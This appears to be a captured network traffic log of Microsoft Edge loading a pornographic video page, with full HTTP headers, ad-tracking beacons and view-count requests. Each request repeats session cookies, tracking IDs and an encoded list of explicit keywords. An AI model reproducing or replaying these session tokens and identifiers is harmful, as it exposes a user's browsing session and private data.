cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: image/gif
content-length: 43
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/tj-ssp/burl?bidid=0a2a1619af9f4d51b73f8c2cbc7bccbc&campaignid=1010869731&cap=0&capttl=0&cbudget=1&fcap=0&icap=0&infos=CrkFCiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&mbudget=1&uid=400a273899a740d9aad181b224bf6633&auction_price=1.9&delivery-server=tjdelivery210&nstartPoint=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/tj-ssp/burl?bidid=0a2a1619af9f4d51b73f8c2cbc7bccbc&campaignid=1010869731&cap=0&capttl=0&cbudget=1&fcap=0&icap=0&infos=CrkFCiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&mbudget=1&uid=400a273899a740d9aad181b224bf6633&auction_price=1.9&delivery-server=tjdelivery210&nstartPoint=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1

Response

HTTP/2.0 200

set-cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1; Max-Age=31536000; Expires=Sun, 05 Oct 2025 16:04:19 GMT; Path=/; Domain=www.pornhub.com; SameSite=Lax
date: Sat, 5 Oct 2024 16:04:19 GMT
content-type: text/plain
content-length: 36
x-trace: 2B55C329551705CFA7C9CD0B2A46606FDFBCB03684000000000000000000
via: 1.1 google
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://www.pornhub.com/_xd/api/link/ed44ad08-f89a-a06e-0a9a-db078cd729d1/origin/a/oldd/ed44ad08-f89a-a06e-0a9a-db078cd729d1

msedge.exe

Remote address:

66.254.114.41:443

Request

POST /_xd/api/link/ed44ad08-f89a-a06e-0a9a-db078cd729d1/origin/a/oldd/ed44ad08-f89a-a06e-0a9a-db078cd729d1 HTTP/2.0
host: www.pornhub.com
content-length: 144
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.pornhub.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

set-cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1; Max-Age=31536000; Expires=Sun, 05 Oct 2025 16:04:22 GMT; Path=/; Domain=www.pornhub.com; SameSite=Lax
date: Sat, 5 Oct 2024 16:04:22 GMT
access-control-allow-origin: https://www.pornhub.com
vary: Origin
access-control-allow-credentials: true
content-type: text/plain
content-length: 36
x-trace: 2BAD21C61DD222C363FA178FF06D5C781B02113775000000000000000000
via: 1.1 google
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/service-worker.js

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /service-worker.js HTTP/2.0
host: www.pornhub.com
cache-control: max-age=0
dnt: 1
accept: */*
service-worker: script
sec-fetch-site: same-origin
sec-fetch-mode: same-origin
sec-fetch-dest: serviceworker
referer: https://www.pornhub.com/service-worker.js
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
if-none-match: "66ff0124-2ab"
if-modified-since: Thu, 03 Oct 2024 20:40:04 GMT

Response

HTTP/2.0 304

server: openresty
date: Sat, 05 Oct 2024 16:04:23 GMT
last-modified: Thu, 03 Oct 2024 20:40:04 GMT
etag: "66ff0124-2ab"
x-frame-options: SAMEORIGIN
expires: Sun, 02 Feb 2025 16:04:23 GMT
cache-control: max-age=10368000
pragma: public
cache-control: public
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=firstQuartile&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=firstQuartile&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:26 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=midpoint&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=midpoint&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uid=ed44ad08-f89a-a06e-0a9a-db078cd729d1
cookie: d_uidb=ed44ad08-f89a-a06e-0a9a-db078cd729d1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:28 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/svvt/add?stype=svv&svalue=457809091&snonce=zrkhl2e4wjq10395&skey=8f71e14e2b870fb23703cb237ccf8ba28bc7eff66a07cb1307d081473940ddd3&stime=1728144256

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /svvt/add?stype=svv&svalue=457809091&snonce=zrkhl2e4wjq10395&skey=8f71e14e2b870fb23703cb237ccf8ba28bc7eff66a07cb1307d081473940ddd3&stime=1728144256 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
